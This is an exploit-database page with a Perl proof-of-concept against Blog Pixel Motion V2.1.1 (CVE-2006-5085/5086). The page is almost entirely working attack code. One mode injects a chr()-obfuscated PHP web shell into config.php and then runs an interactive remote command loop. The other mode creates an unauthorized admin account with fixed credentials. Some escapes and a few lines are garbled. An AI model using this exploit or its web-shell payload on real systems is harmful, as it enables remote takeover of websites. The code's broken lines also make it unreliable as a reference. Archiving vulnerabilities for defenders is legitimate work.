Exploit: Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit ( Ascii Version )

Search:
WLB2

Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit

Published
Credit
Risk
2006.10.02
DarkFig
High
CWE
CVE
Local
Remote
N/A
CVE-2006-5086
CVE-2006-5085
No
Yes

Plain text version

#!/usr/bin/perl

#

# Affected.scr..: Blog Pixel Motion V2.1.1

# Poc.ID........: 12060927

# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)

# Risk.level....: High

# Vendor.Status.: Unpatched

# Src.download..: www.pixelmotion.org/zip/blog2.1.zip

# Poc.link......: acid-root.new.fr/poc/12060927.txt

# Credits.......: DarkFig

#

# print "This exploit is for educational purpose only" x 999; exit;

#

use LWP::UserAgent;

use HTTP::Request::Common;

use HTTP::Response;

use Getopt::Long;

use strict;

print STDOUT "n+", '-' x 60, "+n";

print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |n";

print STDOUT '+', '-' x 60, "+n";

my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res);

my $opt = GetOptions(

'host=s' => $host,

'path=s' => $path,

'proxh=s' => $proxh,

'proxu=s' => $proxu,

'proxp=s' => $proxp,

'choice=s' => $choice);

if(!$host) {

print STDOUT "| Usage: ./zz.pl --host=[www] --path=[/] --choice=[0] |n";

print STDOUT "| [Choice.] 1=PHP_Code_Execution 2=Create_Admin |n";

print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n";

print STDOUT '+', '-' x 60, "+an";

exit(1);

}

if($host !~ /http/) {$host = 'http://'.$host;}

if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

if(!$path) {$path = '/';}

if(!$choice) {$choice = 2;}

my $ua = LWP::UserAgent->new();

$ua->agent('0xzilla');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

my $re->proxy_authorization_basic($proxu, $proxp) if $proxp;

if($choice == 1) {

$re = POST $host.$path.'config.php', [

'nom_blog' => '";

$shcode = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);

$shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);

$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);

$shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);

$shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);

$shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);

$shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);

$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);

$shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);

eval($shcode); die(); //'];

$ua->request($re);

while(<STDIN>){

chomp($cmd = $_);

if($cmd eq 'exit') { exit(0); }

$re = GET $host.$path.'include/variables.php?cmd='.$cmd;

$res = $ua->request($re);

print STDOUT "nn".$res->content."n$sh: ";

}

} else {

$re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';

$ua->request($re);

print STDOUT "[+] Admin login.: wootn";

print STDOUT "[+] Admin passwd: t00wn";

print STDOUT '+', '-' x 60, "+n";

}

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version